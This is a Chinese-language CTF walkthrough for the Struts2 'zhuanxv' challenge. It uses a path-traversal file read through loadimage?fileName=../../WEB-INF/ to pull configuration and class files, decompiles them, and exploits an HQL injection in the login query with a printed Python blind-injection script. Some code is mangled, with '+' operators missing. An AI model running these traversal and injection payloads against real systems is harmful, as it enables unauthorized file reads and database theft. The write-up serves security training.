- 1. 题目
- 1.1. 提示:
- 1.2. 详解
题目
提示:
详解
扫描目录发现了一个list 我们使用了好几个扫描工具,只有wwwscan,和webdirscan可以,(可能是我字典太菜了)
发现需要登录
查看源代码发现,这里有问题,加载图片的方式很诡异 试试文件读取
他的cookie里有jessionid 说明他是使用JAVA写的网页 那么我们尝试找找web.xml
../../WEB-INF/web.xml
有一个struts2 这个是struts的工作原理,以及一些讲解 apps-存放了所有Struts2的示例项目
docs-存放了所有Struts2与XWork的文档
lib-存放了所有Struts2相关的JAR文件以及Struts2运行时所依赖的JAR文件
src-存放了所有Struts2的源码,以Maven所指定的项目结构目录存放
https://blog.csdn.net/u010004082/article/details/79351459
读取struts.xml
loadimage?fileName=../../WEB-INF/classes/struts.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE struts PUBLIC
"-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
"http://struts.apache.org/dtds/struts-2.3.dtd">
<struts>
<constant name="strutsenableDynamicMethodInvocation" value="false"/>
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
<constant name="struts.action.extension" value=","/>
<package name="front" namespace="/" extends="struts-default">
<global-exception-mappings>
<exception-mapping exception="java.lang.Exception" result="error"/>
</global-exception-mappings>
<action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute">
<result name="error">/ctfpage/login.jsp</result>
<result name="success">/ctfpage/welcome.jsp</result>
</action>
<action name="loadimage" class="com.cuitctf.action.DownloadAction">
<result name="success" type="stream">
<param name="contentType">image/jpeg</param>
<param name="contentDisposition">attachment;filename="bg.jpg"</param>
<param name="inputName">downloadFile</param>
</result>
<result name="suffix_error">/ctfpage/welcome.jsp</result>
</action>
</package>
<package name="back" namespace="/" extends="struts-default">
<interceptors>
<interceptor name="oa" class="com.cuitctf.util.UserOAuth"/>
<interceptor-stack name="userAuth">
<interceptor-ref name="defaultStack" />
<interceptor-ref name="oa" />
</interceptor-stack>
</interceptors>
<action name="list" class="com.cuitctf.action.AdminAction" method="execute">
<interceptor-ref name="userAuth">
<param name="excludeMethods">
execute
</param>
</interceptor-ref>
<result name="login_error">/ctfpage/login.jsp</result>
<result name="list_error">/ctfpage/welcome.jsp</result>
<result name="success">/ctfpage/welcome.jsp</result>
</action>
</package>
</struts>这里class里面可以看到很多class类名,尝试了一下,都可以逐个下载,点号换成正斜杠,然后再在后面加个.class就可以下载了,下载后用jd反编译class文件
发现一个看起来和登陆有关的类UserLoginAction,构造payload下载:
?fileName=../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class
我们使用jd-gui java反编译工具 我们将文件下载,并修改为.class文件 我们使用luyten反编译
package com.cuitctf.action;
import com.cuitctf.service.*;
import com.cuitctf.po.*;
import com.cuitctf.util.*;
import org.springframework.context.*;
import com.opensymphony.xwork2.*;
import java.util.regex.*;
import java.util.*;
public class UserLoginAction extends ActionSupport
{
private UserService userService;
private User user;
public UserLoginAction() {
final ApplicationContext context = InitApplicationContext.getApplicationContext();
this.userService = (UserService)context.getBean("userService");
}
public String execute() throws Exception {
System.out.println("start:" this.user.getName());
final ActionContext actionContext = ActionContext.getContext();
final Map<String, Object> request = (Map<String, Object>)actionContext.get("request");
try {
if (!this.userCheck(this.user)) {
request.put("error", "u767bu5f55u5931u8d25uff0cu8bf7u68c0u67e5u7528u6237u540du548cu5bc6u7801");
System.out.println("u767bu9646u5931u8d25");
return "error";
}
}
catch (Exception e) {
e.printStackTrace();
throw e;
}
System.out.println("login SUCCESS");
ActionContext.getContext().getSession().put("user", this.user);
return "success";
}
public boolean isValid(final String username) {
final String valiidateString = "[a-zA-Z0-9]{1-16}";
return matcher(valiidateString, username);
}
private static boolean matcher(final String reg, final String string) {
boolean tem = false;
final Pattern pattern = Pattern.compile(reg);
final Matcher matcher = pattern.matcher(string);
tem = matcher.matches();
return tem;
}
public boolean userCheck(final User user) {
final List<User> userList = (List<User>)this.userService.loginCheck(user.getName(), user.getPassword());
if (userList != null && userList.size() == 1) {
return true;
}
this.addActionError("Username or password is Wrong, please check!");
return false;
}
public UserService getUserService() {
return this.userService;
}
public void setUserService(final UserService userService) {
this.userService = userService;
}
public User getUser() {
return this.user;
}
public void setUser(final User user) {
this.user = user;
}
}截取部分有用的代码
代码语言:javascript复制 public boolean userCheck(User user) {
List<User> userList = this.userService.loginCheck(user.getName(), user.getPassword());
if (userList != null && userList.size() == 1) {
return true;
}
addActionError("Username or password is Wrong, please check!");
return false;
}
发现还有一个userservicempl的类 我们下载
代码语言:javascript复制public List <User> loginCheck(String name, String password) {
name = name.replaceAll(" ", "");
name = name.replaceAll("=", "");
Matcher username_matcher = Pattern.compile("^[0-9a-zA-Z] $").matcher(name);
Matcher password_matcher = Pattern.compile("^[0-9a-zA-Z] $").matcher(password);
if (password_matcher.find()) {
return this.userDao.loginCheck(name, password);
}
return null;
}找到登录的规则
是登陆语句的过滤规则,在UserDaoImpl.class中找到:
代码语言:javascript复制public List < User > loginCheck(String name, String password) {
return getHibernateTemplate().find("from User where name ='" name "' and password = '" password "'");
}这里是大佬的盲注脚本
代码语言:javascript复制import requests
s=requests.session()
flag=''
for i in range(1,50):
p=''
for j in range(1,255):
payload="(select
ascii(substr(id," str(i) ",1))
from
Flag
where
id<2)<'" str(j) "'"
url="http://111.198.29.45:35732/zhuanxvlogin?user.name=admin'
or
" payload "
or
name
like
'admin&user.password=1"
r1=s.get(url)
if len(r1.text)>20000 and p!='':
flag =p
print i,flag
break
p=chr(j)
